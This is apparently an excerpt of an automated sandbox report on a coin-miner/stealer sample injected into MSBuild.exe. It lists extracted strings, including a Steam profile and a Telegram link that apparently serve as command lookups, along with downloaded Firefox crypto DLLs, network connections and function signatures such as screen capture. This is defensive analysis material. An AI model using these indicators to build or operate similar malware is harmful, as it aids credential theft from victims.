                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                        Source: DBKKKEHD.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: DBKKKEHD.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: DBKKKEHD.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761316124.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761316124.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761316124.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://help.steampowered.com/en/
                        Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: https://mozilla.org0/
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761316124.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761316124.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761316124.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                        Source: 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/G
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/discussions/
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                        Source: 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199673019888
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/market/
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.000000000338D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199673019888
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/profiles/76561199673019888/badges
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/profiles/76561199673019888/inventory/
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199673019888H
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.000000000338D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199673019888ve74rMozilla/5.0
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/workshop/
                        Source: 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/
                        Source: 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/about/
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/explore/
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/legal/
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/mobile
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/news/
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/points/shop/
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/stats/
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                        Source: AKKFHDAKECFHIDHJDAAAEBKJEC.1.drString found in binary or memory: https://support.mozilla.org
                        Source: AKKFHDAKECFHIDHJDAAAEBKJEC.1.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                        Source: AKKFHDAKECFHIDHJDAAAEBKJEC.1.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp, HIDAFHDH.1.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                        Source: HIDAFHDH.1.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp, HIDAFHDH.1.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                        Source: HIDAFHDH.1.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.000000000338D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/irfail
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.000000000338D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/irfailAt
                        Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
                        Source: DBKKKEHD.1.drString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: DBKKKEHD.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: AKKFHDAKECFHIDHJDAAAEBKJEC.1.drString found in binary or memory: https://www.mozilla.org
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/:
                        Source: AKKFHDAKECFHIDHJDAAAEBKJEC.1.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/FIDHIEBAKF
                        Source: AKKFHDAKECFHIDHJDAAAEBKJEC.1.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                        Source: AKKFHDAKECFHIDHJDAAAEBKJEC.1.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                        Source: AKKFHDAKECFHIDHJDAAAEBKJEC.1.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/d=enterpk2016&ui=en-us&rs=en-us&ad=us
                        Source: AKKFHDAKECFHIDHJDAAAEBKJEC.1.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                        Source: unknownHTTPS traffic detected: 23.76.43.59:443 -> 192.168.2.4:49731 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 37.27.87.155:443 -> 192.168.2.4:49732 version: TLS 1.2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00411D10 memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,1_2_00411D10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CADED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,1_2_6CADED10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB1B8C0 rand_s,NtQueryVirtualMemory,1_2_6CB1B8C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB1B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,1_2_6CB1B910
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB1B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,1_2_6CB1B700
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CABF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,1_2_6CABF280
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeCode function: 0_2_0571B9880_2_0571B988
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeCode function: 0_2_0571A6B00_2_0571A6B0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeCode function: 0_2_0571E9280_2_0571E928
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeCode function: 0_2_057F83A00_2_057F83A0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeCode function: 0_2_057F1DA80_2_057F1DA8
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeCode function: 0_2_057F1D980_2_057F1D98
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeCode function: 0_2_057F89380_2_057F8938
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeCode function: 0_2_057F89270_2_057F8927
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeCode function: 0_2_057F69AF0_2_057F69AF
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeCode function: 0_2_057F00400_2_057F0040
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeCode function: 0_2_057F001F0_2_057F001F
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeCode function: 0_2_057F00070_2_057F0007
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeCode function: 0_2_057F83910_2_057F8391
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeCode function: 0_2_057F6A780_2_057F6A78
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeCode function: 0_2_057F6AC00_2_057F6AC0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeCode function: 0_2_05852D200_2_05852D20
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeCode function: 0_2_058530470_2_05853047
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeCode function: 0_2_058543280_2_05854328
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041D38A1_2_0041D38A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041F4C01_2_0041F4C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041CE391_2_0041CE39
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041DFB71_2_0041DFB7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAB35A01_2_6CAB35A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAC6C801_2_6CAC6C80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAF6CF01_2_6CAF6CF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB02C101_2_6CB02C10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB2AC001_2_6CB2AC00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAF5C101_2_6CAF5C10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAF0DD01_2_6CAF0DD0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CACFD001_2_6CACFD00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CADED101_2_6CADED10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB14EA01_2_6CB14EA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAD5E901_2_6CAD5E90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CABBEF01_2_6CABBEF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CACFEF01_2_6CACFEF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB19E301_2_6CB19E30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAF7E101_2_6CAF7E10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB26E631_2_6CB26E63
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAD9E501_2_6CAD9E50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB02E4E1_2_6CB02E4E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAF3E501_2_6CAF3E50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CABDFE01_2_6CABDFE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAE6FF01_2_6CAE6FF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAC9F001_2_6CAC9F00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAF58E01_2_6CAF58E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAFB8201_2_6CAFB820
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB048201_2_6CB04820
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAC78101_2_6CAC7810
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAD88501_2_6CAD8850
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CADD8501_2_6CADD850
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CABC9A01_2_6CABC9A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAED9B01_2_6CAED9B0
